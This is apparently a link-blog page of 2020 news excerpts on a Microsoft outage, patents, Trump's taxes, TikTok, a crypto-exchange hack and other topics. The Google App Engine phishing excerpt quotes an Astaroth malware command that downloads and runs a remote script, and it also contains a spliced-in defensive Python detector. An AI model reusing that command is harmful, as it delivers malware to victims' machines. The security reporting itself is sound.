About Robin Edgar


Microsoft Outlook, Office 365, Teams, and other services suffer ~6 hour outage

Some Microsoft services, including Outlook, Office 365, and Microsoft Teams, experienced a multi-hour outage on Monday, but the issues have been resolved, according to the company.

“We’ve confirmed that the residual issue has been addressed and the incident has been resolved,” Microsoft tweeted at 12AM ET on Tuesday. “Any users still experiencing impact should be mitigated shortly.”

The company first acknowledged issues at 5:44PM ET via the Microsoft 365 Status Twitter account, and said it had rolled back a change thought to be the cause of the issue at 6:36PM ET. But just 13 minutes later, the company tweeted again to say that it was “not observing an increase in successful connections after rolling back a recent change.” Microsoft tweeted that services were mostly back at 10:20PM ET.

Microsoft’s Azure Active Directory service was also experiencing issues on Monday, but the company said those were “now mitigated” as of 11:21PM ET Monday night. Microsoft said the problems were caused by a configuration change to a backend storage layer, which the company rolled back.

Update, September 29th, 11:20AM ET: Updated to confirm Microsoft has resolved the issues. The headline has also been updated to reflect this fact.

Source: Microsoft Outlook, Office 365, Teams, and other services are back following outage – The Verge

Yay cloud!

[…]

The core service affected was Azure Active Directory, which controls login to everything from Outlook email to Teams to the Azure portal, used for managing other cloud services. The five-hour impact was also felt in productivity-stopping annoyances like some installations of Microsoft Office and Visual Studio, even on the desktop, declaring that they could not check their licensing and therefore would not run.

There are claims that the US emergency 911 service was affected, which is not implausible given that the RapidDeploy Nimbus Dispatch system describes itself as “a Microsoft Azure–based Computer Aided Dispatch platform”. If the problem is authentication, even resilient services with failover to other Azure regions may become inaccessible and therefore useless.

The company has yet to provide full details, but a status report today said that “a recent configuration change impacted a backend storage layer, which caused latency to authentication requests”.

[…]

Microsoft seems to have more than its fair share of problems. Gartner noted recently that it “continues to have concerns related to the overall architecture and implementation of Azure, despite resilience-focused efforts and improved service availability metrics during the past year”. The analyst’s reservations were based in part on the low ratio of availability zones to regions, and that “a limited set of services support the availability zone model”.

Gartner’s concerns are valid, but this was not the cause of the recent disruption. Bill Witten, identity architect at Okta, was to the point, commenting: “So, does everyone get why the mono-directory is not a good idea?”

Microsoft has built so much on Azure Active Directory that it is a single point of failure. The company either needs to make it so resilient that failure is near-impossible (which is likely to be its intention), or consider gradually reducing the dependence of so many services.

Source: With so many cloud services dependent on it, Azure Active Directory has become a single point of failure for Microsoft

If Patents Are So Important To Innovation, Why Do Innovative Companies Keep Opening Up Their Patents Rather Than Enforcing Them?

To hear many politicians (and, tragically, many academics) tell the story, patents and patent policy are keys to innovation. Indeed, many studies trying to measure innovation use the number of patents as a proxy. For years, we’ve argued that there is little evidence that patents are in any way correlated with innovation. Indeed, in practice, we often see patents get in the way of innovation, rather than being a sign of innovation. If anything, an influx of patents seems to indicate a decline in innovation, because as the saying goes, smart companies innovate, while failed companies litigate. Litigating patents tends to happen when a more established company no longer is able to compete by innovation, and has to bring in the courts to block and stop more nimble competitors.

Indeed, over and over again we seem to see the most innovative companies eschewing the anti-competitive powers that patents give them. I was reminded of this recently with the announcement that payments company Square had agreed to put all of its crypto patents into a new non-profit called the Crypto Open Patent Alliance to help fight off the unfortunate number of crypto patent trolls that are showing up.

Of course, we see this throughout the companies generally considered to be the most innovative. A decade ago, Twitter came up with a very clever Innovator’s Patent Agreement, which effectively would block patent trolls from ever being able to use Twitter’s patents, should they somehow fall into trollish hands. A bunch of other top internet companies including Google, Dropbox, Asana, and Newegg launched the License on Transfer network, as a basic poison pill to, again, stop patent trolls.

And, most famously, Elon Musk flat out gave away Tesla’s patents and encouraged anyone else to use them to compete with Tesla, license-free.

If patents really were so vital to innovation, why would all of these innovative companies be so quick to give them up? And why is it so incredibly rare that any of them assert patents against competitors? Instead, so much of the patent litigation we see is against those innovative companies coming from a variety of patent trolls (frequently lawyers who never innovated at all) or also ran companies which may have been innovative in the past but have long since seen their innovative days in the rearview mirror.

It would be nice if policymakers, the media, and academics finally started recognizing the idea that patents are not just a bad proxy for actual innovation, but often antithetical to innovation, and we can see all the evidence we need for that in the fact that the most innovative companies are “devaluing” in their own patents to improve the ecosystem, rather than enforce those patents.

Source: If Patents Are So Important To Innovation, Why Do Innovative Companies Keep Opening Up Their Patents Rather Than Enforcing Them? | Techdirt

Not only that, but there are whole industries that would be nowhere if patents were enforced rigidly, such as the fashion industry and computer programming.

Report: Financial records appear to show Ivanka Trump got ‘consulting fees’ to reduce father’s tax bill

Tax records obtained by The New York Times appear to show that President Trump reduced his taxable income by treating his eldest daughter, Ivanka Trump, as a consultant, then deducting this as a business expense.

The Times reports that Trump Organization tax records show between 2010 and 2018, President Trump wrote off as business expenses $26 million in “consulting fees.” The consultants are not listed by name, but the Times compared the tax records to financial disclosures Ivanka Trump filed when she started working at the White House in 2017 as a senior adviser to her father. Ivanka Trump reported receiving $747,622 in payments from a consulting company she co-owned — the same exact amount in consulting fees the Trump Organization claimed as tax deductions for hotel projects in Hawaii and Vancouver.

As an executive officer with the Trump Organization, Ivanka Trump managed the Hawaii and Vancouver hotel projects, “meaning she appears to have been treated as a consultant on the same hotel deals that she helped manage as part of her job at her father’s business,” the Times said. Ivanka Trump earned a salary of about $480,000 while serving as an executive with the Trump Organization, and the amount jumped up to $2 million after her father became president, the Times reports; since leaving to work in the White House, she has not received a salary from the company.

The tax filings also show that Trump collected $5 million for a hotel deal in Azerbaijan and reported $1.1 million in consulting fees and made $3 million in Dubai while reporting a $630,000 consulting fee. People with direct knowledge of the deals told the Times they were not aware of any consultants or third parties who would have been paid in connection with the projects.

Source: Report: Financial records appear to show Ivanka Trump got ‘consulting fees’ to reduce father’s tax bill

Blowback Time: China Says TikTok Deal Is A Model For How It Should Deal With US Companies In China

We’ve already covered what a ridiculous, pathetic grift the Oracle/TikTok deal was. Despite it being premised on a “national security threat” from China, because the app might share some data (all of which is easily buyable from data brokers) with Chinese officials, the final deal cured none of that, left the Chinese firm ByteDance with 80% ownership of TikTok, and gave Trump supporters at Oracle a fat contract — and allowed Trump to pretend he did something.

Of course, what he really did was hand China a huge gift. In response to the deal, state media in China is now highlighting how the Chinese government can use this deal as a model for the Chinese to force the restructuring of US tech companies, and force the data to be controlled by local companies in China. This is from the editor-in-chief of The Global Times, a Chinese, state-sponsored newspaper:

That says:

The US restructuring of TikTok’s stake and actual control should be used as a model and promoted globally. Overseas operation of companies such as Google, Facebook shall all undergo such restructure and be under actual control of local companies for security concerns.

So, beyond doing absolutely nothing to solve the “problem” that politicians in the US laid out, the deal works in reverse. It’s given justification for China to mess with American companies in the same way, and push to expose more data to the Chinese government.

Great work, Trump. Hell of a deal.

Meanwhile, the same Twitter feed says that it’s expected that officials in Beijing are going to reject the deal from their end, and seek to negotiate one even more favorable to China’s “national security interests and dignity.”

So, beyond everything else, Trump’s “deal” has probably done more to help China, and harm data privacy and protection, while also handing China a justification playbook to do so: “See, we’re just following your lead!”

Source: Blowback Time: China Says TikTok Deal Is A Model For How It Should Deal With US Companies In China | Techdirt

KuCoin crypto exchange cracked, $130m in Bitcoin burgled

A cryptocurrency exchange called KuCoin says it has been cracked, with over $100m of assets misappropriated.

The Register last covered KuCoin when it was mentioned by the Bitcoin-burgling cybercrooks who hacked a bunch of prominent Twitter users.

The Seychelles-based outfit, founded in 2017, proudly boasts of its venture capital backers who clearly admire its services facilitating trading of “numerous digital assets and cryptocurrencies”. And on Saturday it advised users that it “detected some large withdrawals since September 26, 2020 at 03:05:37 (UTC+8)” and that an internal security audit revealed “part of Bitcoin, ERC-20 and other tokens in KuCoin’s hot wallets were transferred out of the exchange, which contained few parts of our total assets holdings. The assets in our cold wallets are safe and unharmed, and hot wallets have been re-deployed.”

The company also promised that any losses would be covered by insurance, but also advised that deposit and withdrawal services would be suspended pending a security review.

A later update included an FAQ in which customers asked why some of the withdrawals continued even after the first incident notification was posted. KuCoin assured customers it conducted those transactions itself and advised that restoration of withdrawal functions could take a week. In the volatile world of cryptocurrency, a week can be the difference between a win and a bust.

A Monday update, the latest, revealed the scale of the hack as KuCoin identified over $130m of assets. It also describes work among a number of crypto players to identify suspicious transactions, freeze transactions, and even lists some addresses suspected of involvement in the heist.

“KuCoin has been in touch with a growing number of industry partners to take tangible actions, thanks to all of you for your support!,” the statement concluded.

However, the latest statement does not offer any further information on the cause of the incident, remediation steps, or restoration times.

So there you have it, dear reader: a venture-backed startup, based in a tax haven, demonstrating the future of money in all its glory.

And in the background, China is deciding that its own digital currency will be run only by its biggest banks, with new payment players like Alibaba not allowed anywhere near its innermost workings.

Source: Stop us if you’ve heard this one before: Crypto exchange cracked, Bitcoin burgled • The Register

Metal wires of carbon complete toolbox for carbon-based computers

Transistors based on carbon rather than silicon could potentially boost computers’ speed and cut their power consumption more than a thousandfold — think of a mobile phone that holds its charge for months — but the set of tools needed to build working carbon circuits has remained incomplete until now.

A team of chemists and physicists at the University of California, Berkeley, has finally created the last tool in the toolbox, a metallic wire made entirely of carbon, setting the stage for a ramp-up in research to build carbon-based transistors and, ultimately, computers.

“Staying within the same material, within the realm of carbon-based materials, is what brings this technology together now,” said Felix Fischer, UC Berkeley professor of chemistry, noting that the ability to make all circuit elements from the same material makes fabrication easier. “That has been one of the key things that has been missing in the big picture of an all-carbon-based integrated circuit architecture.”

[…]

“Nanoribbons allow us to chemically access a wide range of structures using bottom-up fabrication, something not yet possible with nanotubes,” Crommie said. “This has allowed us to basically stitch electrons together to create a metallic nanoribbon, something not done before. This is one of the grand challenges in the area of graphene nanoribbon technology and why we are so excited about it.”

Metallic graphene nanoribbons — which feature a wide, partially-filled electronic band characteristic of metals — should be comparable in conductance to 2D graphene itself.

“We think that the metallic wires are really a breakthrough; it is the first time that we can intentionally create an ultra-narrow metallic conductor — a good, intrinsic conductor — out of carbon-based materials, without the need for external doping,” Fischer added.

Crommie, Fischer and their colleagues at UC Berkeley and Lawrence Berkeley National Laboratory (Berkeley Lab) will publish their findings in the Sept. 25 issue of the journal Science.

[…]

Several years ago, Fischer and Crommie teamed up with theoretical materials scientist Steven Louie, a UC Berkeley professor of physics, to discover new ways of connecting small lengths of nanoribbon to reliably create the full gamut of conducting properties.

Two years ago, the team demonstrated that by connecting short segments of nanoribbon in the right way, electrons in each segment could be arranged to create a new topological state — a special quantum wave function — leading to tunable semiconducting properties.

In the new work, they use a similar technique to stitch together short segments of nanoribbons to create a conducting metal wire tens of nanometers long and barely a nanometer wide.

The nanoribbons were created chemically and imaged on very flat surfaces using a scanning tunneling microscope. Simple heat was used to induce the molecules to chemically react and join together in just the right way. Fischer compares the assembly of daisy-chained building blocks to a set of Legos, but Legos designed to fit at the atomic scale.

“They are all precisely engineered so that there is only one way they can fit together. It’s as if you take a bag of Legos, and you shake it, and out comes a fully assembled car,” he said. “That is the magic of controlling the self-assembly with chemistry.”

Once assembled, the new nanoribbon’s electronic state was a metal — just as Louie predicted — with each segment contributing a single conducting electron.

The final breakthrough can be attributed to a minute change in the nanoribbon structure.

“Using chemistry, we created a tiny change, a change in just one chemical bond per about every 100 atoms, but which increased the metallicity of the nanoribbon by a factor of 20, and that is important, from a practical point of view, to make this a good metal,” Crommie said.

The two researchers are working with electrical engineers at UC Berkeley to assemble their toolbox of semiconducting, insulating and metallic graphene nanoribbons into working transistors.

“I believe this technology will revolutionize how we build integrated circuits in the future,” Fischer said. “It should take us a big step up from the best performance that can be expected from silicon right now. We now have a path to access faster switching speeds at much lower power consumption. That is what is driving the push toward a carbon-based electronics semiconductor industry in the future.”

Source: Metal wires of carbon complete toolbox for carbon-based computers | Berkeley News

Trump Paid $750 in Income Tax in 2016 and 2017

President Donald Trump paid just $750 in federal income taxes the year he ran for president and in his first year in the White House, according to a report Sunday in The New York Times.

Trump, who has fiercely guarded his tax filings and is the only president in modern times not to make them public, paid no federal income taxes in 10 of the past 15 years.

The details of the tax filings complicate Trump’s description of himself as a shrewd and patriotic businessman, revealing instead a series of financial losses and income from abroad that could come into conflict with his responsibilities as president. The president’s financial disclosures indicated he earned at least $434.9 million in 2018, but the tax filings reported a $47.4 million loss.

The tax filings also illustrate how a reputed billionaire could pay little to nothing in taxes, while someone in the middle class could pay substantially more than him. Nearly half of Americans pay no income taxes, primarily because of how their low incomes are. But IRS figures indicate that the average tax filer paid roughly $12,200 in 2017, about 16 times more than what the president paid.

The disclosure, which the Times said comes from tax return data it obtained extending over two decades, comes at a pivotal moment ahead of the first presidential debate Tuesday and weeks before a divisive election against Democrat Joe Biden.

Speaking at a news conference Sunday at the White House, Trump dismissed the report as “fake news” and maintained he has paid taxes, though he gave no specifics. He also vowed that information about his taxes “will all be revealed,” but he offered no timeline for the disclosure and made similar promises during the 2016 campaign on which he never followed through.

In fact, the president has fielded court challenges against those seeking access to his returns, including the U.S. House, which is suing for access to Trump’s tax returns as part of congressional oversight.

During his first two years as president, Trump received $73 million from foreign operations, which in addition to his golf properties in Scotland and Ireland included $3 million from the Philippines, $2.3 million from India and $1 million from Turkey, among other nations. The president in 2017 paid $145,400 in taxes in India and $156,824 in the Philippines, compared to just $750 in U.S. income taxes. The Times said the tax records did not reveal any unreported connections to Russia.

Trump found multiple ways to reduce his tax bills. He has taken tax deductions on personal expenses such as housing, aircraft and $70,000 to style his hair while he filmed “The Apprentice.” Losses in the property businesses solely owned and managed by Trump appear to have offset income from his stake in “The Apprentice” and other entities with multiple owners.

During the first two years of his presidency, Trump relied on business tax credits to reduce his tax obligations. The Times said $9.7 million worth of business investment credits that were submitted after Trump requested an extension to file his taxes allowed him to reduce his income and pay just $750 each in 2016 and 2017.

Income tax payments help finance the military and domestic programs.

Trump, starting in 2010, claimed and received an income tax refund that totaled $72.9 million, which the Times said was at the core of an ongoing audit by the IRS. The Times said a ruling against Trump could cost him $100 million or more. He also has more than $300 million in loans due to be repaid in the next four years.

Richard Neal, D-Mass., the chair of the House Ways and Means Committee who has tried unsuccessfully to obtain Trump’s tax records, said the Times report makes it even more essential for his committee to get the documents.

“It appears that the President has gamed the tax code to his advantage and used legal fights to delay or avoid paying what he owes,” Neal wrote in a statement. “Now, Donald Trump is the boss of the agency he considers an adversary. It is essential that the IRS’s presidential audit program remain free of interference.”

A lawyer for the Trump Organization, Alan Garten, and a spokesperson for the Trump Organization did not immediately respond to a request for comment from The Associated Press on the report.

Garten told the Times that “most, if not all, of the facts appear to be inaccurate.”

He said in a statement to the news organization that the president “has paid tens of millions of dollars in personal taxes to the federal government, including paying millions in personal taxes since announcing his candidacy in 2015.”

The New York Times said it declined to provide Garten with the tax filings in order to protect its sources, but it said its sources had legal access to the records.

During his first general election debate against Democrat Hillary Clinton in 2016, Clinton said that perhaps Trump wasn’t releasing his tax returns because he had paid nothing in federal taxes.

Trump interrupted her to say, “That makes me smart.”

Source: Trump Paid $750 in Income Tax in 2016 and 2017: Report | Time

US judge temporarily blocks Trump shakedown order banning TikTok app store downloads

A judge in Washington has temporarily blocked a Trump administration order banning Apple and Google from offering Chinese-owned app TikTok for download that was set to take effect at 11:59pm on Sunday.

US district judge Carl Nichols granted a preliminary injunction sought by TikTok’s owner, ByteDance, to allow the app to remain available at US app stores, but declined “at this time” to block additional commerce department restrictions that are set to take effect on 12 November that TikTok has said would have the impact of making the app impossible to use in the United States.

Nichols’ detailed written opinion is expected to be released as soon as Monday.

The Commerce Department said in a statement it “will comply with the injunction and has taken immediate steps to do so.” The statement, which defended the TikTok order and Trump’s executive order demanding owner ByteDance divest its TikTok US operations within 90 days, did not specify whether the government would appeal.

TikTok said it was pleased with the injunction and added it “will also maintain our ongoing dialogue with the government to turn our proposal, which the president gave his preliminary approval to last week, into an agreement.”

The company’s lawyer John Hall had said a ban would be “punitive” and close off a public forum used by tens of millions of Americans.

In a written brief filed ahead of the hearing, TikTok lawyers said the ban was “arbitrary and capricious” and “would undermine data security” by blocking updates and fixes to the app used by some 100 million Americans.

The company also said the ban was unnecessary because negotiations were already underway to restructure the ownership of TikTok to address national security issues raised by the administration.

TikTok has an estimated 100 million users in the US and 700 million worldwide, making it one of the largest operators in the social media space.

Government lawyers argued the president had a right to take national security actions, and said the ban was needed because of TikTok’s links to the Chinese government through its parent firm ByteDance.

A government brief called ByteDance “a mouthpiece” for the Chinese Communist Party and said it was “committed to promoting the CCP’s agenda and messaging.”

ByteDance said on 20 September it had struck a preliminary deal for Walmart Inc and Oracle Corp to take stakes in a new company, TikTok Global, that would oversee US operations after Trump said he had given the deal his “blessing.” Negotiations continue over the terms of the agreement and to resolve concerns from Washington and Beijing.

The deal is still to be reviewed by the US government’s Committee on Foreign Investment in the United States (CFIUS).

Source: US judge temporarily blocks Trump order banning TikTok app store downloads | Technology | The Guardian

Google App Engine feature abused to create unlimited phishing pages

A newly discovered technique by a researcher shows how Google’s App Engine domains can be abused to deliver phishing and malware while remaining undetected by leading enterprise security products.

Google App Engine is a cloud-based service platform for developing and hosting web apps on Google’s servers.

While reports of phishing campaigns leveraging enterprise cloud domains are nothing new, what makes Google App Engine infrastructure risky is how its subdomains get generated and how paths are routed.

Practically unlimited subdomains for one app

Typically, scammers use cloud services to create a malicious app that gets assigned a subdomain. They then host phishing pages there, or they may use the app as a command-and-control (C2) server to deliver a malware payload.

But the URL structures are usually generated in a manner that makes them easy to monitor and block using enterprise security products, should there be a need.

For example, a malicious app hosted on Microsoft Azure services may have a URL structure like: https://example-subdomain.app123.web.core.windows.net/…

Therefore, a cybersecurity professional could block traffic to and from this particular app by simply blocking requests to and from this subdomain. This wouldn’t prevent communication with the rest of the Microsoft Azure apps that use other subdomains.

It gets a bit more complicated, however, in the case of Google App Engine.

Security researcher Marcel Afrahim demonstrated an intended design of Google App Engine’s subdomain generator, which can be abused to use the app infrastructure for malicious purposes, all while remaining undetected.

Google’s appspot.com domain, which hosts apps, has the following URL structure:

VERSION-dot-SERVICE-dot-PROJECT_ID.REGION_ID.r.appspot.com

A subdomain, in this case, does not just represent an app; it encodes the app’s version, the service name, the project ID, and the region ID.

But the most important point to note here is, if any of those fields are incorrect, Google App Engine won’t show a 404 Not Found page, but instead show the app’s “default” page (a concept referred to as soft routing).

“Requests are received by any version that is configured for traffic in the targeted service. If the service that you are targeting does not exist, the request gets Soft Routed,” states Afrahim, adding:

“If a request matches the PROJECT_ID.REGION_ID.r.appspot.com portion of the hostname, but includes a service, version, or instance name that does not exist, then the request is routed to the default service, which is essentially your default hostname of the app.”

Essentially, this means there are a lot of permutations of subdomains to get to the attacker’s malicious app. As long as every subdomain has a valid “project_ID” field, invalid variations of other fields can be used at the attacker’s discretion to generate a long list of subdomains, which all lead to the same app.

For example, as shown by Afrahim, both URLs below, which look drastically different, represent the same app hosted on Google App Engine.

https://random123-random123-random123-dot-bad-app-2020.ue.r.appspot.com
https://insertanythingyouwanthere-xyz123-xyz123-dot-bad-app-2020.ue.r.appspot.com

“Verified by Google Trust Services” means trusted by everyone

The fact that a single malicious app is now represented by multiple permutations of its subdomains makes it hard for sysadmins and security professionals to block malicious activity.

But further, to a technologically unsavvy user, all of these subdomains would appear to be a “secure site.” After all, the appspot.com domain and all its subdomains come with the seal of “Google Trust Services” in their SSL certificates.

Image: Google App Engine sites showing a valid SSL certificate with “Verified by: Google Trust Services” text (source: Afrahim)

Even further, most enterprise security solutions such as Symantec WebPulse web filter automatically allow traffic to trusted category sites. And Google’s appspot.com domain, due to its reputation and legitimate corporate use cases, earns an “Office/Business Applications” tag, skipping the scrutiny of web proxies.

Image: Google App Engine traffic automatically trusted by most enterprise security solutions

On top, a large number of subdomain variations renders the blocking approach based on Indicators of Compromise (IOCs) useless.
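The soft routing described above is easier to defend against once every observed hostname is collapsed to the project it actually routes to, because a blocklist or IOC keyed on the project ID survives the subdomain permutations that defeat a hostname-keyed one. The following is an added example, not code from the article or from Afrahim’s research. It normalises appspot.com hostnames to PROJECT_ID.REGION_ID.r.appspot.com by discarding everything before the last `-dot-`, then uses that for a project-keyed blocklist and a fan-out detector that flags a single app seen behind many distinct generated subdomains (the pattern of the 2,000-subdomain phishing app mentioned later in the article). It goes slightly beyond the article in also accepting the older region-less PROJECT_ID.appspot.com form; the project-ID character rule and the sample URLs marked as constructed are assumptions.

```python
"""Collapse Google App Engine hostname permutations to the project they route to.

Added example; not code from the article or from Afrahim's research. Assumes the
hostname layout the article quotes (VERSION-dot-SERVICE-dot-PROJECT_ID.REGION_ID.r.appspot.com)
plus the older region-less PROJECT_ID.appspot.com form; anything else yields None.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Assumption: project-ID labels are lowercase letters, digits and hyphens, not ending in a hyphen.
PROJECT_RE = re.compile(r"[a-z][a-z0-9-]*[a-z0-9]|[a-z]")


def _hostname(url_or_host):
    """Extract a lowercase hostname from a full URL or a bare host[/path]."""
    return (urlsplit(url_or_host if "//" in url_or_host else "//" + url_or_host).hostname or "").lower()


def canonical_appspot_host(url_or_host):
    """Return (project_id, canonical_host) for an appspot.com URL/hostname, else None.

    App Engine soft-routes unknown version/service/instance prefixes to the default
    service, so every "X-dot-Y-dot-PROJECT.REGION.r.appspot.com" is the same app.
    Everything up to the last "-dot-" is therefore discarded.
    """
    host = _hostname(url_or_host).rstrip(".")
    if not host.endswith(".appspot.com"):
        return None
    tail = host.rsplit("-dot-", 1)[-1]  # PROJECT.REGION.r.appspot.com or PROJECT.appspot.com
    labels = tail.split(".")
    if len(labels) == 5 and labels[2] == "r":     # regional form from the article
        project = labels[0]
    elif len(labels) == 3:                         # older region-less form (assumed)
        project = labels[0]
    else:
        return None
    if not PROJECT_RE.fullmatch(project):
        return None
    return project, tail


def group_by_project(urls):
    """Map each canonical App Engine host to the distinct hostnames observed for it."""
    groups = defaultdict(set)
    for url in urls:
        hit = canonical_appspot_host(url)
        if hit:
            groups[hit[1]].add(_hostname(url))
    return dict(groups)


def flag_fanout(urls, threshold=3):
    """Canonical hosts seen under at least `threshold` distinct hostnames.

    One app fronted by many generated subdomains is the signal; a legitimate app
    rarely rotates its hostname, whereas a phishing kit abusing soft routing does.
    """
    return sorted(h for h, seen in group_by_project(urls).items() if len(seen) >= threshold)


def is_blocked(url, blocked_projects):
    """Blocklist check keyed on project ID rather than on the full hostname."""
    hit = canonical_appspot_host(url)
    return bool(hit) and hit[0] in blocked_projects


# Constructed sample traffic: the two hostnames quoted in the article plus invented entries.
SAMPLE_URLS = [
    "https://random123-random123-random123-dot-bad-app-2020.ue.r.appspot.com/login",
    "https://insertanythingyouwanthere-xyz123-xyz123-dot-bad-app-2020.ue.r.appspot.com/login",
    "https://v7-dot-api-dot-bad-app-2020.ue.r.appspot.com/",        # constructed
    "https://legit-corp-app.uc.r.appspot.com/dashboard",             # constructed, benign
    "https://example-subdomain.app123.web.core.windows.net/",        # Azure example from the article
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(url, "->", canonical_appspot_host(url))
    print("fan-out:", flag_fanout(SAMPLE_URLS))
```

Feed `flag_fanout` the hostnames from proxy or DNS logs over a short window; the canonical host it returns is what belongs in a blocklist or case note, not the individual generated subdomains.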

A screenshot of a test app created by Afrahim along with a detailed “how-to” demonstrates this behavior in action.

In the past, Cloudflare domain generation had a similar design flaw, which the Astaroth malware would exploit via the following command when fetching its stage 2 payload:

%ComSpec% /c “echo GetObject(“script:hxxps://xsw%RANDOM%nnccccmd95c22[.]cloudflareworkers[.]com/.edgeworker-fiddle-init-preview/6a8db783ccc67c314de2767f33605caec2262527cbed408b4315c2e2d54cf0371proud-glade-92ec.ativadormasterplus.workers.dev/?09/”)” > %temp%\Lqncxmm:vbvvjjh.js && start wscript.exe %temp%\Lqncxmm:vbvvjjh.js”

This would essentially launch a Windows command prompt with a random number substituted for %RANDOM%, making the payload URL truly dynamic.

“And now you have a script that downloads the payload from different URL hostnames each time it is run and would render the network IOC of such a hypothetical sample absolutely useless. The solutions that rely on a single run on a sandbox to obtain automated IOC would therefore get a new Network IOC and potentially a new file IOC if the script is modified just a bit,” said the researcher.

Image: Delivering malware via Google App Engine subdomain variations while bypassing IOC blocks

Actively exploited for phishing attacks

Security engineer and pentester Yusuke Osumi tweeted last week how a Microsoft phishing page hosted on the appspot.com subdomain was exploiting the design flaw Afrahim has detailed.

Osumi additionally compiled a list of over 2,000 subdomains generated dynamically by the phishing app—all of them leading to the same phishing page.

Active exploitation of Google App Engine subdomains in phishing attacks
Source: Twitter

This recent example has shifted the focus of discussion from how Google App Engine’s flaw can be potentially exploited to active phishing campaigns leveraging the design flaw in the wild.

“Use a Google Drive/Service phishing kit on Google’s App Engine and a normal user would not just realize it is not Google which is asking for credentials,” concluded Afrahim in his blog post.

Source: Google App Engine feature abused to create unlimited phishing pages

Formula 1 drivers told they cannot wear slogans or messages in post-race duties

Formula 1 drivers have been told they cannot wear clothing bearing any slogans or messages while doing official duties after grands prix.

The move is a reaction to Mercedes’ Lewis Hamilton wearing a T-shirt at the last race in Tuscany referencing the case of a woman killed by US police.

The FIA said podium finishers “must remain attired only in their driving suits done up to the neck”.

This must be the case throughout the podium ceremony and interviews.

The requirements include a “medical face mask or team-branded face mask”.

The move had been expected after talks between the FIA, Mercedes and Hamilton’s representatives before this weekend’s Russian Grand Prix.

At Mugello, Hamilton wore a T-shirt saying: “Arrest the cops who killed Breonna Taylor” at the official pre-race anti-racism demonstration and on the podium and during the post-race interviews.

He had previously worn a Black Lives Matter T-shirt for the demonstration, but not after the race, while other drivers wore the FIA official “End Racism” T-shirts.

The FIA looked into whether they should investigate Hamilton on the grounds of breaking any rules, but decided against it.

Political messages have long been banned on the podium in F1.

Hamilton said at the Russian Grand Prix: “I did something that has never really happened in F1 and obviously they will stop it from happening moving forwards.”

[…]

Source: Formula 1 drivers told they cannot wear slogans or messages in post-race duties – BBC Sport

New measurements show moon has hazardous radiation levels

Future moon explorers will be bombarded with two to three times more radiation than astronauts aboard the International Space Station, a health hazard that will require thick-walled shelters for protection, scientists reported Friday.

China’s lander on the far side of the moon is providing the first full measurements of radiation exposure from the lunar surface, vital information for NASA and others aiming to send astronauts to the moon, the study noted.

[…]

Astronauts would get 200 to 1,000 times more radiation on the moon than what we experience on Earth—or five to 10 times more than passengers on a trans-Atlantic airline flight, noted Robert Wimmer-Schweingruber of Christian-Albrechts University in Kiel, Germany.

“The difference is, however, that we’re not on such a flight for as long as astronauts would be when they’re exploring the moon,” Wimmer-Schweingruber said in an email.

Cancer is the primary risk.

“Humans are not really made for these radiation levels and should protect themselves when on the moon,” he added.

[…]

Wimmer-Schweingruber said the radiation levels are close to what models had predicted. The levels measured by Chang’e 4, in fact, “agree nearly exactly” with measurements by a detector on a NASA orbiter that has been circling the moon for more than a decade, said Kerry Lee, a space radiation expert at Johnson Space Center in Houston.

“It is nice to see confirmation of what we think and our understanding of how radiation interacts with the moon is as expected,” said Lee, who was not involved in the Chinese-led study.

[…]

The German researchers suggest shelters built of moon dirt—readily available material—for stays of more than a few days. The walls should be 80 centimeters (about 2 1/2 feet) thick, they said. Any thicker and the dirt will emit its own secondary radiation, created when galactic cosmic rays interact with the lunar soil.

Source: New measurements show moon has hazardous radiation levels

China says it won’t approve TikTok sale, calls it ‘extortion’. Finally someone calling it what it is.

The September 20 deadline for a purported TikTok sale has already passed, but the parties involved have yet to settle terms on the deal. ByteDance and TikTok’s bidders Oracle and Walmart presented conflicting messages on the future ownership of the app, confusing investors and users. Meanwhile, Beijing’s discontent with the TikTok sale is increasingly obvious.

China has no reason to approve the “dirty” and “unfair” deal that allows Oracle and Walmart to effectively take over TikTok based on “bullying and extortion,” slammed an editorial published Wednesday in China Daily, an official English-language newspaper of the Chinese Communist Party.

The editorial argued that TikTok’s success — a projected revenue of about a billion dollars by the end of 2020 — “has apparently made Washington feel uneasy” and prompted the U.S. to use “national security as the pretext to ban the short video sharing app.”

The official message might stir mixed feelings within ByteDance, which has along the way tried to prove its disassociation from the Chinese authority, a precondition for the companies’ products to operate freely in Western countries.

Beijing has already modified a set of export rules to complicate the potential TikTok deal, restricting the sale of certain AI-technologies to foreign companies. Both ByteDance and China’s state media have said the agreement won’t involve technological transfers.

The Trump administration said it would ban downloads of TikTok, which boasts 100 million users in the country, if an acceptable deal was not reached. It also planned to shut down Tencent’s WeChat, a decision that just got blocked by a district court in San Francisco.

TikTok has collected nearly 198 million App Store and Google Play installs in the U.S., while WeChat has been installed by nearly 22 million users in the U.S. since 2014, according to market research firm Sensor Tower. Unlike TikTok, which has a far-reaching user base in the U.S., WeChat is mainly used by Chinese-speaking communities or those with connections in China, where the messenger is the dominant chat app and most Western alternatives are blocked.

[…]

Source: China says it won’t approve TikTok sale, calls it ‘extortion’ | TechCrunch

Ex-eBay global intel staffers to admit they cyberstalked online tat bazaar’s critics – who got pig heads, funeral wreath, and more in the mail

Four of the seven former eBay employees charged with cyberstalking a couple critical of the web auction house are scheduled to plead guilty next month.

In June, the US Justice Department charged six former staffers – director of safety and security James Baugh, 45, of San Jose, California; director of global resiliency David Harville, 48, of New York City; manager of global intelligence Stephanie Stockwell, 26, of Redwood City, California; and eBay Global Intelligence Center staffers Stephanie Popp, 32, Veronica Zea, 26, and Brian Gilbert, 51, all of San Jose – with conspiring to commit cyberstalking and tamper with witnesses.

The US Attorney’s Office of Massachusetts on Wednesday said four former eBay employees charged in that case plan to admit guilt at a video conference hearing scheduled for October 8, 2020.

A spokesperson for the USAO of Massachusetts confirmed to The Register the four individuals are Brian Gilbert, Stephanie Popp, Stephanie Stockwell, and Veronica Zea. The cases against the two most senior executives in the group, Harville and Baugh, remain ongoing; both deny the accusations.

In July, a seventh former eBay employee, former Santa Clara police captain Philip Cooke, 55, who oversaw security operations at eBay’s offices in Europe and Asia, was charged separately for alleged involvement in the harassment campaign.

The defendants are said [PDF] to have participated in a concerted effort to intimidate and silence a husband and wife team who run an ecommerce-focused newsletter and blog in a campaign last year.

[…]

It describes a harassment effort that consisted, among other things, of sending the newsletter publishers live cockroaches, the head of a fetal pig, a funeral wreath, a mask of a bloody pig’s head, and a book on surviving the loss of a spouse.

Unasked

